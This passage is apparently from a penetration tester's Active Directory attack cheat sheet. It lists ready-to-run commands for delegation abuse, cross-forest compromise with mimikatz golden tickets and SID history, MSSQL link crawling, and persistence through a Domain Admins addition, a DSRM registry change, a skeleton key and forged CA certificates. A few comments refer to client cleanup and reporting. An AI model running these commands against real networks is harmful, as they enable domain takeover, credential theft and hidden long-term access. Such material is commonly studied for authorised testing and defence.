        - rubeus.exe hash /password:{COMPUTER PASS} /user:{COMPUTER} /domain:{DOMAIN}

            - rubeus.exe s4u /user:{HELL-YEAH-COMPUTER$} /aes256:{AES256HASH} /impersonateuser:administrator /msdsspn:cifs/{VICTIM.DOMAIN} /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt

        - rbcd.py -delegate-from '{COMPUTER}$' -delegate-to '{TARGET}$' -dc-ip '{DCIP}' -action 'write' {DOMAIN}/{USER}:{PASSWORD}

            - getST.py -spn host/{DCFQDN} '{DOMAIN}/{COMPUTER}$:{COMPUTERPASS}' -impersonate Administrator -dc-ip {DCIP}

        - add account

            - addcomputer.py -computer-name '{COMPUTER}' -computer-pass '{PASSWORD}' -dc-host {DCIP} -domain-netbios {DOMAINNETBIOS} '{DOMAIN}/{USER}:{PASSWORD}'

TRUST RELATIONSHIP

FOREST and FOREST

To allow users in both Forest 1 and Forest 3 to share resources, a two-way transitive trust must be created between the two forests. If a one-way forest trust is created between two forests, members of the trusted forest can utilize resources located in the trusting forest.

- # ENUM

    - nltest /trusted_domains

    - ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

    - Get-DomainTrust -domain {DOMAIN}

    - Get-DomainTrustMapping

- # FOREST COMPROMISE

    - Get-DomainSID -Domain {DOMAIN}

    - Get-DomainSID -Domain {TARGET}

        - mimikatz lsadump::trust /patch

        - mimikatz lsadump::dcsync /domain:{DOMAIN} /user:{DOMAIN}\krbtgt

            - mimikatz kerberos::golden /user:Administrator /domain:{DOMAIN} /sid:{DOMAINSID} /aes256:{AES256TRUSTKEY} /sids:{TARGETSID}-519 /service:krbtgt /target:{TARGET} /ptt

- # FOREIGN

    - foreign domain USER

        - MATCH p=(n:User)-[:MemberOf]->(m:Group) WHERE n.domain="{DOMAIN}" AND m.domain<>n.domain RETURN p

    - foreign domain GROUP

        - MATCH p=(n:Group {domain:"{DOMAIN}"})-[:MemberOf]->(m:Group) WHERE m.domain<>n.domain AND n.name<>m.name RETURN p

    - Get-DomainForeignGroupMember -Domain {TARGET}

        - convertfrom-sid {SID}

- # MY FOREST TO YOUR FOREST ;) extra sid

    - Get-DomainSID -Domain {DOMAIN}

    - Get-DomainSID -Domain {TARGET}

        - Filter SID

            - Get-DomainGroupMember -Identity "{GROUP}" -Domain {TARGET}

                - mimikatz lsadump::dcsync /domain:{DOMAIN} /user:{DOMAIN}\krbtgt

                    - mimikatz kerberos::golden /user:Administrator /krbtgt:{KRBTGT_HASH} /domain:{DOMAIN} /sid:{USERSID} /sids:{ROOTSID}-{GROUPSIDSUP1000} /ptt

- # COMPROMISE forest to forest (MSSQL)

    - Get-SQLServerLinkCrawl -username {USER} -password {PASS} -Verbose -Instance {SQLINSTANCE}

    - mssqlclient.py -windows-auth {DOMAIN}/{USER}:{PASSWORD}@{IP}

        - TRUSTLINK/SP_LINKEDSERVERS/USE_LINK

PERSISTENCE

why not?

Persistence in cybersecurity occurs when a threat actor discreetly maintains long-term access to systems despite disruptions such as restarts or changed credentials. Bad actors can place an implant or a “stub” that both evades automated antivirus solutions and kickstarts more malware.

- # TICKETS

    - net group "domain admins" gary23w /add /domain

    - gold # golden tickets stay valid until krbtgt is rotated twice; record every forged ticket for the report so the client can clean up

        - ticketer.py -aesKey {AESKEY} -domain-sid {DOMAINSID} -domain {DOMAIN} {ANY}

        - mimikatz "kerberos::golden /user:{USER} /domain:{DOMAIN} /sid:{DOMAINSID} /aes256:{KRBTGT_AES256} /ptt"

    - Powershell New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD # lets the DSRM account log on over the network; persistent registry change, remove it after the engagement

    - SKELETON KEY (master password: mimikatz) # patches LSASS in memory on the DC, lost on reboot, but any account can log on with this password until then; report it

        - mimikatz "privilege::debug" "misc::skeleton"

    - certipy ca -backup -ca '{CANAME}' -username {USER}@{DOMAIN} -hashes {HASH}

        - certipy forge -ca-pfx {CAPRIVATEKEY} -upn {USER}@{DOMAIN} -subject 'CN={USER},CN=Users,DC={COMP},DC={LOCAL}' # the stolen CA key mints certs for any principal; the client must reissue the CA to revoke this

    - TODO: add more